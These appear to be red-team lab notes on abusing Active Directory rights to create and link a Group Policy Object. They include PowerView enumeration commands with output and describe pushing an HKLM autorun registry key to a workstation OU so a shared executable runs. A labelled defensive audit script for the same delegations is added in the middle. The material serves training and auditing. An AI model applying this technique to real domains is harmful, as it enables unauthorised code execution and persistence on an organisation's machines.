Create & Link a GPO

Find principals that can create new GPOs in the domain

powershell Get-DomainObjectAcl -Identity "CN=Policies,CN=System,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" -and $_.ActiveDirectoryRights -contains "CreateChild" } | % { ConvertFrom-SID $_.SecurityIdentifier }

DEV\Developers

Being able to create a GPO doesn't achieve anything unless it can be linked to an OU.

Look for OUs that GPOs can be linked to

powershell Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN,ActiveDirectoryRights,ObjectAceType,SecurityIdentifier | fl

ObjectDN              : OU=Workstations,DC=dev,DC=cyberbotic,DC=io

This shows that members of the "Developers" group can link GPOs to the "Workstations" OU.
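For defenders, the same two delegations can be audited with the RSAT ActiveDirectory module. The script below is an added example, not part of the original notes; the `$expected` allow-list and the helper function names are assumptions to adjust for your environment.

```powershell
# Added audit example, not from the original notes. Requires the RSAT ActiveDirectory module.
Import-Module ActiveDirectory

# Assumption: principals expected to hold these rights; adjust for your environment.
$expected = 'Domain Admins', 'Enterprise Admins', 'Group Policy Creator Owners',
            'Administrators', 'SYSTEM', 'ENTERPRISE DOMAIN CONTROLLERS'

$domainDN  = (Get-ADDomain).DistinguishedName
$schemaNC  = (Get-ADRootDSE).schemaNamingContext
$anyObject = [guid]::Empty   # an ACE with an empty ObjectType covers every class and attribute

# Look up a class or attribute GUID in the schema instead of hard-coding it.
function Get-SchemaGuid([string]$LdapName) {
    $o = Get-ADObject -SearchBase $schemaNC -LDAPFilter "(lDAPDisplayName=$LdapName)" -Properties schemaIDGUID
    [guid]$o.schemaIDGUID
}

# Return Allow ACEs on $DN that grant $Right for $ObjectType to an unexpected principal.
# The -band bit test also matches GenericAll and GenericWrite; inherit-only ACEs are skipped.
function Find-DelegatedRight {
    param([string]$DN, [System.DirectoryServices.ActiveDirectoryRights]$Right,
          [guid]$ObjectType, [string]$Finding)
    (Get-Acl -Path "AD:\$DN").Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($_.ActiveDirectoryRights -band $Right) -and
        ($_.ObjectType -eq $ObjectType -or $_.ObjectType -eq $anyObject) -and
        -not ($_.PropagationFlags -band [System.Security.AccessControl.PropagationFlags]::InheritOnly) -and
        (($_.IdentityReference.Value -split '\\')[-1] -notin $expected)
    } | ForEach-Object {
        [pscustomobject]@{
            Finding   = $Finding
            ObjectDN  = $DN
            Principal = $_.IdentityReference.Value
            Rights    = $_.ActiveDirectoryRights
        }
    }
}

$gpc       = Get-SchemaGuid 'groupPolicyContainer'
$gpLink    = Get-SchemaGuid 'gPLink'
$findings  = @(Find-DelegatedRight "CN=Policies,CN=System,$domainDN" CreateChild $gpc 'Create GPO')
$findings += @(Get-ADOrganizationalUnit -Filter * | ForEach-Object {
    Find-DelegatedRight $_.DistinguishedName WriteProperty $gpLink 'Link GPO'
})
$findings | Sort-Object Principal, Finding | Format-Table -AutoSize

# Creating a GPO only matters once it can be linked, so flag principals that hold both rights.
$findings | Group-Object Principal |
    Where-Object { @($_.Group.Finding | Select-Object -Unique).Count -eq 2 } |
    Select-Object -ExpandProperty Name
```

Any principal printed by the last pipeline holds both delegations and should be reviewed first.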

Check whether the required GroupPolicy module is present on the machine

powershell Get-Module -List -Name GroupPolicy | select -expand ExportedCommands

Backup-GPO                 Backup-GPO                
Block-GPInheritance        Block-GPInheritance       
Copy-GPO                   Copy-GPO                  
Get-GPInheritance          Get-GPInheritance         
Get-GPO                    Get-GPO

If the necessary module is not present, use SharpGPO instead -> SharpGPO/SharpGPOAbuse

Some abuses can be implemented directly using RSAT. For example, the Set-GPPrefRegistryValue cmdlet can be used to add an HKLM autorun key to the registry.

Be sure the executable is present in the share.

Next, apply the GPO to the target OU.

Remember that HKLM autoruns require a reboot to execute.